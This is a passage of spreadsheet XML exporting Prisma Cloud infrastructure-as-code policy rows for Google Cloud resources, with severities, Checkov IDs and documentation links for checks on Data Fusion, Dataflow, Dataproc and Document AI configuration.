      <c r="O971" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P971" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q971" t="inlineStr"/>
      <c r="R971" t="inlineStr"/>
      <c r="S971" t="inlineStr"/>
      <c r="T971" t="b">
        <v>0</v>
      </c>
      <c r="U971" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V971" t="inlineStr">
        <is>
          <t>IaC:General:google-data-fusion-instance</t>
        </is>
      </c>
      <c r="W971" t="inlineStr">
        <is>
          <t>Ensure Data fusion instances are private</t>
        </is>
      </c>
      <c r="X971" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-fusion-instances-are-private</t>
        </is>
      </c>
      <c r="Y971" t="inlineStr"/>
      <c r="Z971" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_data_fusion_instance"]}</t>
        </is>
      </c>
      <c r="AA971" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB971" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC971" t="inlineStr">
        <is>
          <t>CKV_GCP_87</t>
        </is>
      </c>
      <c r="AD971" t="b">
        <v>1</v>
      </c>
      <c r="AE971" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF971" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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1" t="inlineStr">
        <is>
          <t>dad1746b-73ac-45c8-bf9f-17531937dbd1</t>
        </is>
      </c>
      <c r="AI971" t="inlineStr"/>
      <c r="AJ971" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK971" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" t="inlineStr"/>
      <c r="B972" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C972" s="2" t="inlineStr"/>
      <c r="D972" t="inlineStr"/>
      <c r="E972" t="inlineStr"/>
      <c r="F972" t="inlineStr"/>
      <c r="G972" t="b">
        <v>1</v>
      </c>
      <c r="H9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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J972" t="inlineStr">
        <is>
          <t>IaC:General:google-data</t>
        </is>
      </c>
      <c r="K972" t="inlineStr">
        <is>
          <t>GCP DataFusion does not have stack driver logging enabled</t>
        </is>
      </c>
      <c r="L972" t="inlineStr"/>
      <c r="M972" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N972" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O972" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P972" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q972" t="inlineStr"/>
      <c r="R972" t="inlineStr"/>
      <c r="S972" t="inlineStr"/>
      <c r="T972" t="b">
        <v>0</v>
      </c>
      <c r="U972" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V972" t="inlineStr">
        <is>
          <t>IaC:General:google-data-fusion-instance</t>
        </is>
      </c>
      <c r="W972" t="inlineStr">
        <is>
          <t>Ensure Datafusion has stack driver logging enabled</t>
        </is>
      </c>
      <c r="X972" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-logging-enabled</t>
        </is>
      </c>
      <c r="Y972" t="inlineStr"/>
      <c r="Z972" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_data_fusion_instance"]}</t>
        </is>
      </c>
      <c r="AA972" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB972" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC972" t="inlineStr">
        <is>
          <t>CKV_GCP_104</t>
        </is>
      </c>
      <c r="AD972" t="b">
        <v>1</v>
      </c>
      <c r="AE972" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF972" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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2" t="inlineStr">
        <is>
          <t>619ea932-56a1-499f-8e54-be6f7aa2e96e</t>
        </is>
      </c>
      <c r="AI972" t="inlineStr"/>
      <c r="AJ972" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK972" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" t="inlineStr"/>
      <c r="B973" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C973" s="2" t="inlineStr"/>
      <c r="D973" t="inlineStr"/>
      <c r="E973" t="inlineStr"/>
      <c r="F973" t="inlineStr"/>
      <c r="G973" t="b">
        <v>1</v>
      </c>
      <c r="H9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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J973" t="inlineStr">
        <is>
          <t>IaC:General:google-data</t>
        </is>
      </c>
      <c r="K973" t="inlineStr">
        <is>
          <t>GCP DataFusion does not have stack driver monitoring enabled</t>
        </is>
      </c>
      <c r="L973" t="inlineStr"/>
      <c r="M973" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N973" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O973" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P973" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q973" t="inlineStr"/>
      <c r="R973" t="inlineStr"/>
      <c r="S973" t="inlineStr"/>
      <c r="T973" t="b">
        <v>0</v>
      </c>
      <c r="U973" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V973" t="inlineStr">
        <is>
          <t>IaC:General:google-data-fusion-instance</t>
        </is>
      </c>
      <c r="W973" t="inlineStr">
        <is>
          <t>Ensure Datafusion has stack driver monitoring enabled</t>
        </is>
      </c>
      <c r="X973" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-monitoring-enabled</t>
        </is>
      </c>
      <c r="Y973" t="inlineStr"/>
      <c r="Z973" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_data_fusion_instance"]}</t>
        </is>
      </c>
      <c r="AA973" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB973" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC973" t="inlineStr">
        <is>
          <t>CKV_GCP_105</t>
        </is>
      </c>
      <c r="AD973" t="b">
        <v>1</v>
      </c>
      <c r="AE973" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF973" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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3" t="inlineStr">
        <is>
          <t>d207319b-a2d3-4896-8cdd-a7d4efbb7c1d</t>
        </is>
      </c>
      <c r="AI973" t="inlineStr"/>
      <c r="AJ973" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK973" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" t="inlineStr"/>
      <c r="B974" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C974" s="2" t="inlineStr"/>
      <c r="D974" t="inlineStr"/>
      <c r="E974" t="inlineStr"/>
      <c r="F974" t="inlineStr"/>
      <c r="G974" t="b">
        <v>1</v>
      </c>
      <c r="H9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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J974" t="inlineStr">
        <is>
          <t>IaC:General:google-dataflow</t>
        </is>
      </c>
      <c r="K974" t="inlineStr">
        <is>
          <t>GCP data flow jobs are not encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="L974" t="inlineStr"/>
      <c r="M974" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N974" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O974" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P974" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q974" t="inlineStr"/>
      <c r="R974" t="inlineStr"/>
      <c r="S974" t="inlineStr"/>
      <c r="T974" t="b">
        <v>0</v>
      </c>
      <c r="U974" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V974" t="inlineStr">
        <is>
          <t>IaC:General:google-dataflow-job</t>
        </is>
      </c>
      <c r="W974" t="inlineStr">
        <is>
          <t>Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="X974" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-flow-jobs-are-encrypted-with-customer-supplied-encryption-keys-csek</t>
        </is>
      </c>
      <c r="Y974" t="inlineStr"/>
      <c r="Z974" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_dataflow_job"]}</t>
        </is>
      </c>
      <c r="AA974" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB974" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC974" t="inlineStr">
        <is>
          <t>CKV_GCP_90</t>
        </is>
      </c>
      <c r="AD974" t="b">
        <v>1</v>
      </c>
      <c r="AE974" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF974" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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4" t="inlineStr">
        <is>
          <t>16e69d18-0a3c-4049-9c9c-a1f0d1bc7212</t>
        </is>
      </c>
      <c r="AI974" t="inlineStr"/>
      <c r="AJ974" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK974" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" t="inlineStr"/>
      <c r="B975" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C975" s="2" t="inlineStr"/>
      <c r="D975" t="inlineStr"/>
      <c r="E975" t="inlineStr"/>
      <c r="F975" t="inlineStr"/>
      <c r="G975" t="b">
        <v>1</v>
      </c>
      <c r="H9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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J975" t="inlineStr">
        <is>
          <t>IaC:General:google-dataflow</t>
        </is>
      </c>
      <c r="K975" t="inlineStr">
        <is>
          <t>GCP Dataflow jobs are not private</t>
        </is>
      </c>
      <c r="L975" t="inlineStr"/>
      <c r="M975" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N975" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O975" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P975" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q975" t="inlineStr"/>
      <c r="R975" t="inlineStr"/>
      <c r="S975" t="inlineStr"/>
      <c r="T975" t="b">
        <v>0</v>
      </c>
      <c r="U975" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V975" t="inlineStr">
        <is>
          <t>IaC:General:google-dataflow-job</t>
        </is>
      </c>
      <c r="W975" t="inlineStr">
        <is>
          <t>Ensure Dataflow jobs are private</t>
        </is>
      </c>
      <c r="X975" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-cloud-dataflow-job-has-public-ips</t>
        </is>
      </c>
      <c r="Y975" t="inlineStr"/>
      <c r="Z975" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_dataflow_job"]}</t>
        </is>
      </c>
      <c r="AA975" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB975" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC975" t="inlineStr">
        <is>
          <t>CKV_GCP_94</t>
        </is>
      </c>
      <c r="AD975" t="b">
        <v>1</v>
      </c>
      <c r="AE975" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF975" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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5" t="inlineStr">
        <is>
          <t>0dac0cf1-0ac1-43df-8bdc-6b0ea4c31143</t>
        </is>
      </c>
      <c r="AI975" t="inlineStr"/>
      <c r="AJ975" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK975" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" t="inlineStr"/>
      <c r="B976" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C976" s="2" t="inlineStr"/>
      <c r="D976" t="inlineStr"/>
      <c r="E976" t="inlineStr"/>
      <c r="F976" t="inlineStr"/>
      <c r="G976" t="b">
        <v>1</v>
      </c>
      <c r="H9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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J976" t="inlineStr">
        <is>
          <t>IaC:General:google-dataproc</t>
        </is>
      </c>
      <c r="K976" t="inlineStr">
        <is>
          <t>GCP Dataproc Clusters have public IPs</t>
        </is>
      </c>
      <c r="L976" t="inlineStr"/>
      <c r="M976" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N976" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O976" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P976" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q976" t="inlineStr"/>
      <c r="R976" t="inlineStr"/>
      <c r="S976" t="inlineStr"/>
      <c r="T976" t="b">
        <v>0</v>
      </c>
      <c r="U976" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V976" t="inlineStr">
        <is>
          <t>IaC:General:google-dataproc-cluster</t>
        </is>
      </c>
      <c r="W976" t="inlineStr">
        <is>
          <t>Ensure Dataproc Clusters do not have public IPs</t>
        </is>
      </c>
      <c r="X976" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-does-not-have-a-public-ip</t>
        </is>
      </c>
      <c r="Y976" t="inlineStr"/>
      <c r="Z976" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_dataproc_cluster"]}</t>
        </is>
      </c>
      <c r="AA976" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB976" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC976" t="inlineStr">
        <is>
          <t>CKV_GCP_103</t>
        </is>
      </c>
      <c r="AD976" t="b">
        <v>1</v>
      </c>
      <c r="AE976" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF976" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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6" t="inlineStr">
        <is>
          <t>541aafce-57c0-445f-9945-abd9fec2d5c4</t>
        </is>
      </c>
      <c r="AI976" t="inlineStr"/>
      <c r="AJ976" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK976" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" t="inlineStr"/>
      <c r="B977" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C977" s="2" t="inlineStr"/>
      <c r="D977" t="inlineStr"/>
      <c r="E977" t="inlineStr"/>
      <c r="F977" t="inlineStr"/>
      <c r="G977" t="b">
        <v>1</v>
      </c>
      <c r="H9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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J977" t="inlineStr">
        <is>
          <t>IaC:General:google-dataproc</t>
        </is>
      </c>
      <c r="K977" t="inlineStr">
        <is>
          <t>GCP Dataproc clusters are anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="L977" t="inlineStr"/>
      <c r="M977" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N977" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O977" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P977" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q977" t="inlineStr"/>
      <c r="R977" t="inlineStr"/>
      <c r="S977" t="inlineStr"/>
      <c r="T977" t="b">
        <v>0</v>
      </c>
      <c r="U977" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V977" t="inlineStr">
        <is>
          <t>IaC:General:google-dataproc-cluster-iam-member,google-dataproc-cluster-iam-binding</t>
        </is>
      </c>
      <c r="W977" t="inlineStr">
        <is>
          <t>Ensure that Dataproc clusters are not anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="X977" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-dataproc-cluster-is-not-anonymously-or-publicly-accessible</t>
        </is>
      </c>
      <c r="Y977" t="inlineStr"/>
      <c r="Z977" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_dataproc_cluster_iam_member", "google_dataproc_cluster_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA977" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB977" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC977" t="inlineStr">
        <is>
          <t>CKV_GCP_98</t>
        </is>
      </c>
      <c r="AD977" t="b">
        <v>1</v>
      </c>
      <c r="AE977" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF977" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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7" t="inlineStr">
        <is>
          <t>a2137a15-0625-4e4c-b6c3-29062acad177</t>
        </is>
      </c>
      <c r="AI977" t="inlineStr"/>
      <c r="AJ977" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK977" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" t="inlineStr"/>
      <c r="B978" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C978" s="2" t="inlineStr"/>
      <c r="D978" t="inlineStr"/>
      <c r="E978" t="inlineStr"/>
      <c r="F978" t="inlineStr"/>
      <c r="G978" t="b">
        <v>1</v>
      </c>
      <c r="H9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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J978" t="inlineStr">
        <is>
          <t>IaC:General:google-document</t>
        </is>
      </c>
      <c r="K978" t="inlineStr">
        <is>
          <t>Document AI Processors not encrypted with a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L978" t="inlineStr"/>
      <c r="M978" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N978" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O978" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P978" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q978" t="inlineStr"/>
      <c r="R978" t="inlineStr"/>
      <c r="S978" t="inlineStr"/>
      <c r="T978" t="b">
        <v>0</v>
      </c>
      <c r="U978" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V978" t="inlineStr">
        <is>
          <t>IaC:General:google-document-ai-processor</t>
        </is>
      </c>
      <c r="W978" t="inlineStr">
        <is>
          <t>Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="X978" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-2-22</t>
        </is>
      </c>
      <c r="Y978" t="inlineStr"/>
      <c r="Z978" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_document_ai_processor"]}</t>
        </is>
      </c>
      <c r="AA978" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB978" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC978" t="inlineStr">
        <is>
          <t>CKV2_GCP_22</t>
        </is>
      </c>
      <c r="AD978" t="b">
        <v>1</v>
      </c>
      <c r="AE978" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF978" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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8" t="inlineStr">
        <is>
          <t>f9b840e8-214c-480e-a0dd-a350eba583db</t>
        </is>
      </c>
      <c r="AI978" t="inlineStr"/>
      <c r="AJ978" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK978" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" t="inlineStr"/>
      <c r="B979" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C979" s="2" t="inlineStr"/>
      <c r="D979" t="inlineStr"/>
      <c r="E979" t="inlineStr"/>
      <c r="F979" t="inlineStr"/>
      <c r="G979" t="b">
        <v>1</v>
      </c>
      <c r="H9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79" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J979" t="inlineStr">
        <is>
          <t>IaC:General:google-document</t>
        </is>
      </c>
      <c r="K979" t="inlineStr">
        <is>
          <t>Document AI Warehouse Location is not configured to use a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L979" t="inlineStr"/>
      <c r="M979" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N979" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O979" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P979" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q979" t="inlineStr"/>
      <c r="R979" t="inlineStr"/>
      <c r="S979" t="inlineStr"/>
      <c r="T979" t="b">
        <v>0</v>
      </c>
      <c r="U979" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V979" t="inlineStr">
        <is>
          <t>IaC:General:google-document-ai-warehouse-location</t>
        </is>
      </c>
      <c r="W979" t="inlineStr">
        <is>
          <t>Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="X979" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-2-23</t>
        </is>
      </c>
      <c r="Y979" t="inlineStr"/>
      <c r="Z979" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_document_ai_warehouse_location"]}</t>
        </is>
      </c>
      <c r="AA979" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB979" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC979" t="inlineStr">
        <is>
          <t>CKV2_GCP_23</t>
        </is>
      </c>
      <c r="AD979" t="b">
        <v>1</v>
      </c>
      <c r="AE979" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF979" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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79" t="inlineStr">
        <is>
          <t>986b4881-40da-4272-a12e-9872d8ccb876</t>
        </is>
      </c>
      <c r="AI979" t="inlineStr"/>
      <c r="AJ979" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK979" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" t="inlineStr"/>
      <c r="B980" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C980" s="2" t="inlineStr"/>
      <c r="D980" t="inlineStr"/>
      <c r="E980" t="inlineStr"/>
      <c r="F980" t="inlineStr"/>
      <c r="G980" t="b">
        <v>1</v>
      </c>
      <c r="H9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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J980" t="inlineStr">
        <is>
          <t>IaC:General:google-healthcare-dataset</t>
        </is>
      </c>
      <c r="K980" t="inlineStr">
        <is>
          <t>There are not only GCP-managed service account keys for each service account</t>
        </is>
      </c>
      <c r="L980" t="inlineStr"/>
      <c r="M980" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N980" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O980" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P980" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q980" t="inlineStr"/>
      <c r="R980" t="inlineStr"/>
      <c r="S980" t="inlineStr"/>
      <c r="T980" t="b">
        <v>0</v>
      </c>
      <c r="U980" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V980" t="inlineStr">
        <is>
          <t>IaC:General:google-healthcare-dataset-iam,google-identity-platform-tenant-oauth-idp-config,google-compute-node-template,google-iap-web-backend-service-iam,google-compute-snapshot,google-organization-iam-binding,google-access-context-manager-service-perimeter-resource,google-access-context-manager-access-level,google-deployment-manager-deployment,google-sourcerepo-repository-iam,google-compute-global-network-endpoint,google-kms-key-ring-iam,google-iap-tunnel-instance-iam,google-compute-region-disk-resource-policy-attachment,google-compute-region-url-map,google-monitoring-service,google-compute-disk,google-bigtable-app-profile,google-compute-network,google-identity-platform-tenant,google-dialogflow-intent,google-service-networking-connection,google-billing-account-iam-policy,google-folder,google-identity-platform-inbound-saml-config,google-compute-instance-iam,google-logging-organization-exclusion,google-cloud-asset-organization-feed,google-compute-security-policy,google-monitoring-dashboard,google-project-service,google-secret-manager-secret-iam,google-spanner-instance,google-monitoring-alert-policy,google-bigtable-gc-policy,google-network-management-connectivity-test-resource,google-compute-region-disk,google-healthcare-hl7-v2-store,google-storage-default-object-acl,google-secret-manager-secret,google-bigtable-instance-iam,google-folder-iam-audit-config,google-runtimeconfig-config,google-compute-backend-service,google-dataflow-job,google-compute-target-ssl-proxy,google-app-engine-application,google-sql-database,google-compute-target-pool,google-sql-ssl-cert,google-spanner-instance-iam,google-monitoring-slo,google-compute-attached-disk,google-compute-project-metadata,google-compute-target-https-proxy,google-iap-client,google-storage-bucket-access-control,google-healthcare-fhir-store-iam,google-compute-region-autoscaler,google-data-catalog-entry-group,google-composer-environment,google-billing-account-iam-member,google-compute-region-ssl-certificate,google-storage-hmac-key,google-iap-web-iam,google-app-engine-domain-mapping,google-storage-notification,google-logging-organization-bucket-config,google-organization-policy,google-datastore-index,google-logging-metric,google-sql-database-instance,google-organization-iam-policy,google-compute-instance-group,google-compute-instance-group-manager,google-data-catalog-tag,google-folder-iam-binding,google-pubsub-topic,google-logging-folder-sink,google-container-registry,google-compute-vpn-tunnel,google-scc-source,google-kms-secret-ciphertext,google-access-context-manager-service-perimeter,google-endpoints-service,google-dialogflow-entity-type,google-bigtable-instance,google-cloudfunctions-cloud-function-iam,google-cloudiot-device,google-compute-interconnect-attachment,google-compute-network-endpoint,google-spanner-database-iam,google-logging-folder-exclusion,google-app-engine-firewall-rule,google-storage-bucket,google-logging-project-bucket-config,google-compute-autoscaler,google-runtimeconfig-variable,google-app-engine-service-split-traffic,google-healthcare-fhir-store,google-iap-app-engine-version-iam,google-usage-export-bucket,google-bigtable-table,google-dataflow-flex-template-job,google-kms-key-ring,google-kms-crypto-key-iam,google-pubsub-topic-iam,google-kms-crypto-key,google-compute-ssl-policy,google-dataproc-cluster,google-compute-region-target-http-proxy,google-container-node-pool,google-compute-node-group,google-cloud-run-service,google-filestore-instance,google-compute-router-nat,google-service-account,google-compute-route,google-project-iam,google-logging-project-exclusion,google-compute-project-default-network-tier,google-compute-backend-service-signed-url-key,google-compute-subnetwork,google-cloudbuild-trigger,google-compute-address,google-pubsub-subscription,google-compute-global-network-endpoint-group,google-dns-managed-zone,google-project-iam-custom-role,google-compute-target-instance,google-data-catalog-entry,google-os-config-patch-deployment,google-identity-platform-oauth-idp-config,google-ml-engine-model,google-compute-instance,